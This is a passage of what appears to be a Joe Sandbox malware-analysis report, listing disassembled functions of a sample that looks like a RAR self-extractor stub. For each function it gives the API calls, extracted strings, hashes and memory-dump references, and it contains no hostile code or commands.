                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                      • String ID: STATIC
                                      • API String ID: 2845197485-1882779555
                                      • Opcode ID: 78a31a4efe0ab47c952b7d5b86f246e3101edceda410ba3bca2e3451aad4df38
                                      • Instruction ID: 74abc8fe6e03e0fe61b80f6c0cc64ea4f6bb2fb9c5d7342a4013405e0a555f34
                                      • Opcode Fuzzy Hash: 78a31a4efe0ab47c952b7d5b86f246e3101edceda410ba3bca2e3451aad4df38
                                      • Instruction Fuzzy Hash: 441106725407117BE7216BB09C4EFAF7E6CFF94792F004110FA45A20E2DA658F0996B5
                                      Function 005196F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00519705
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 00519711
                                      • _free.LIBCMT ref: 0051971C
                                      • _free.LIBCMT ref: 00519727
                                      • _free.LIBCMT ref: 00519732
                                      • _free.LIBCMT ref: 0051973D
                                      • _free.LIBCMT ref: 00519748
                                      • _free.LIBCMT ref: 00519753
                                      • _free.LIBCMT ref: 0051975E
                                      • _free.LIBCMT ref: 0051976C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: ae96da6894417aff9f9698a04d5eeef1a8927cb4d8b7b386b7c1af87a2e37f3e
                                      • Instruction ID: be76eb812a4c4a640ea1b75761303fab925d4046665574d0c1c599661c90a431
                                      • Opcode Fuzzy Hash: ae96da6894417aff9f9698a04d5eeef1a8927cb4d8b7b386b7c1af87a2e37f3e
                                      • Instruction Fuzzy Hash: 9C11D77510020AAFDB11EF54D846CED3FB5FF54350B1158A4FA084F162DF31EA909B84
                                      Function 004F6FA5 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 329COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F6FAA
                                      • _wcslen.LIBCMT ref: 004F7013
                                      • _wcslen.LIBCMT ref: 004F7084
                                        • Part of subcall function 004FA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,004F977F,?,?,004F95CF,00000000,Function_00032641,000000FF), ref: 004FA1F1
                                        • Part of subcall function 004F9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 004F9E70
                                        • Part of subcall function 004F9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,004F95D6,00000000,Function_00032641,000000FF), ref: 004F963B
                                        • Part of subcall function 004FA4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,004FA325,00000001,004F70E6,?,004FA175,?,00000001,00000000,?,?), ref: 004FA501
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: File$_wcslen$AttributesChangeCloseDeleteFindH_prologNotificationTime
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$SE1$UNC\$\??\
                                      • API String ID: 1400313419-102587364
                                      • Opcode ID: 88a7357f26770f58012f04af4a947b12e269621dbe44e9748b1398a21b9c71d8
                                      • Instruction ID: c27e85fe17a9a8872d92bc7756d80cff64b4f45a32af7e573c1cc2db165a8300
                                      • Opcode Fuzzy Hash: 88a7357f26770f58012f04af4a947b12e269621dbe44e9748b1398a21b9c71d8
                                      • Instruction Fuzzy Hash: 3FC1D471904609AADB25DB74CC85FFFB7A8BF04304F00455AFA56E7282D73CAA48CB65
                                      Function 00512E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 322700389-393685449
                                      • Opcode ID: 02ff2c386828bac414164a7696d683c92e419f28417a5862e8e4d226b2eae133
                                      • Instruction ID: 3152cfaef0b4d561c7d455ccbe174640e7d3fb434ad0dcccae6549e4fb67fad8
                                      • Opcode Fuzzy Hash: 02ff2c386828bac414164a7696d683c92e419f28417a5862e8e4d226b2eae133
                                      • Instruction Fuzzy Hash: 47B17B7580020AEFEF25DFA4C8999EEBFB6FF44310F144559E8016B212D771DAA2CB91
                                      Function 0050B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050B610
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0050B637
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0050B650
                                      • SetWindowTextW.USER32(?,?), ref: 0050B661
                                      • GetDlgItem.USER32(?,00000065), ref: 0050B66A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0050B67E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0050B694
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: 4f9c6879c5258285c7ef7480083f7c0a5236e7fdc94a0d936f52b5ea2851ef96
                                      • Instruction ID: 054f3e7cccde48ac2b88f79432ca78d7efe41b694813568dff07cee4f05f7333
                                      • Opcode Fuzzy Hash: 4f9c6879c5258285c7ef7480083f7c0a5236e7fdc94a0d936f52b5ea2851ef96
                                      • Instruction Fuzzy Hash: C421CE32604315BBE2115B66EC8EE7F3E6CFB56B86F010014F604A61E0CB539A09A635
                                      Function 00509711 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: FvnP$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 176396367-114433949
                                      • Opcode ID: 89f01d1296c1db194c92e6bf599c547774f959312035d173ddfcf2a4c3585c45
                                      • Instruction ID: ccbc5d61da54f8aa80344259d7838fdc97d15cdab7414af594767f9c8a60c4cc
                                      • Opcode Fuzzy Hash: 89f01d1296c1db194c92e6bf599c547774f959312035d173ddfcf2a4c3585c45
                                      • Instruction Fuzzy Hash: 863125322087127AE725AB349C0AFAF7FACFF93310F14011DF501961D6EB649A4987A6
                                      Function 004F1100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: UP$pP$zP
                                      • API String ID: 176396367-1396412275
                                      • Opcode ID: f57f5c5968d80c7adfcab184c5c77b37a05e6bebe6723e455d97ae46416c82db
                                      • Instruction ID: bb9b89218c4562d047960dea5f71c01c81f7e151611195844873ff0909e280bc
                                      • Opcode Fuzzy Hash: f57f5c5968d80c7adfcab184c5c77b37a05e6bebe6723e455d97ae46416c82db
                                      • Instruction Fuzzy Hash: 8341C47190066A9BCB219FA8CC5D9EF7BB8EF41311F00001AF945F7291DB34AE498BA4
                                      Function 00509ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00509EEE
                                      • GetWindowRect.USER32(?,00000000), ref: 00509F44
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00509FDB
                                      • SetWindowTextW.USER32(?,00000000), ref: 00509FE3
                                      • ShowWindow.USER32(00000000,00000005), ref: 00509FF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: P$RarHtmlClassName
                                      • API String ID: 3937224194-284636800
                                      • Opcode ID: 34cf0b8967979db68e53b67c5b88fdad7c5b72c9aec9c78fc740c9236ad3844b
                                      • Instruction ID: 88a747a7d7859c0da60adecfcb598c49d559e8092ea09d3a2622e70dc115a6ed
                                      • Opcode Fuzzy Hash: 34cf0b8967979db68e53b67c5b88fdad7c5b72c9aec9c78fc740c9236ad3844b
                                      • Instruction Fuzzy Hash: F4419C31004315AFDB225F74DC5CB6BBFA8FB98742F008559F8499A096DB34D948DB61
                                      Function 004F2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 004F2536
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                        • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 3053425827-2277559157
                                      • Opcode ID: a7e69f02471f2a8cc9b89d4051e65647e9155c9d41aaf5c5acf31186d3eeeab5
                                      • Instruction ID: e12a0a48c0fcbbbb84e7755e0c8bf4549ec888e91c51b32d4b374fde693d9ccd
                                      • Opcode Fuzzy Hash: a7e69f02471f2a8cc9b89d4051e65647e9155c9d41aaf5c5acf31186d3eeeab5
                                      • Instruction Fuzzy Hash: EEF135706042889BDB14EB2486D5BBF77956F80304F08056FEE869B383CAAC9945C76A
                                      Function 0050A80C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0050A699: GetDC.USER32(00000000), ref: 0050A69D
                                        • Part of subcall function 0050A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0050A6A8
                                        • Part of subcall function 0050A699: ReleaseDC.USER32(00000000,00000000), ref: 0050A6B3
                                      • GetObjectW.GDI32(?,00000018,?), ref: 0050A83C
                                        • Part of subcall function 0050AAC9: GetDC.USER32(00000000), ref: 0050AAD2
                                        • Part of subcall function 0050AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0050AB01
                                        • Part of subcall function 0050AAC9: ReleaseDC.USER32(00000000,?), ref: 0050AB99
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID: "P$($AP$lUR
                                      • API String ID: 1061551593-248661177
                                      • Opcode ID: 23408bbf00706b32859cb9a3e04f1ccfe24a511d03361b877b17a7b815353c5d
                                      • Instruction ID: 6242354a3a927050da3f8d2d5f9c96fd1374d40d3b8480faded2818ee522179a
                                      • Opcode Fuzzy Hash: 23408bbf00706b32859cb9a3e04f1ccfe24a511d03361b877b17a7b815353c5d
                                      • Instruction Fuzzy Hash: 9A91E275604355AFD720DF25C848A2BBBE8FFD9700F00491EF59AD72A0DB30A946DB62
                                      Function 004FAF24 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                      • API String ID: 3519838083-3505469590
                                      • Opcode ID: 7596a8f58c8ec2f00fbdfa04dc2187e5037bfd03747d81e926c617b9d447d442
                                      • Instruction ID: bd633dc264ff63d6f8c853e574fd0493b7e0114e85a9ce4b5d33d189d3e98c16
                                      • Opcode Fuzzy Hash: 7596a8f58c8ec2f00fbdfa04dc2187e5037bfd03747d81e926c617b9d447d442
                                      • Instruction Fuzzy Hash: 39718E74A00219EFDB14DF64DC959BFBBB9FF49310B14015EE616A72A0CB38AD06CB60
                                      Function 00509CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: </p>$</style>$<br>$<style>$>
                                      • API String ID: 176396367-3568243669
                                      • Opcode ID: aa310a8ebeb15fdc8ce3fe2afd08d364c200ac7e6b4c094b295b92b4facebb60
                                      • Instruction ID: a53ad6c90a74c69e51d371dcc28c33583daf6b9cab90f94a763487117a20d243
                                      • Opcode Fuzzy Hash: aa310a8ebeb15fdc8ce3fe2afd08d364c200ac7e6b4c094b295b92b4facebb60
                                      • Instruction Fuzzy Hash: EA514C6778072395DB309A15DC2177F7BE5FFA1790F68041AF9C18B1CAFB658C8182A1
                                      Function 00512900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00512937
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0051293F
                                      • _ValidateLocalCookies.LIBCMT ref: 005129C8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 005129F3
                                      • _ValidateLocalCookies.LIBCMT ref: 00512A48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
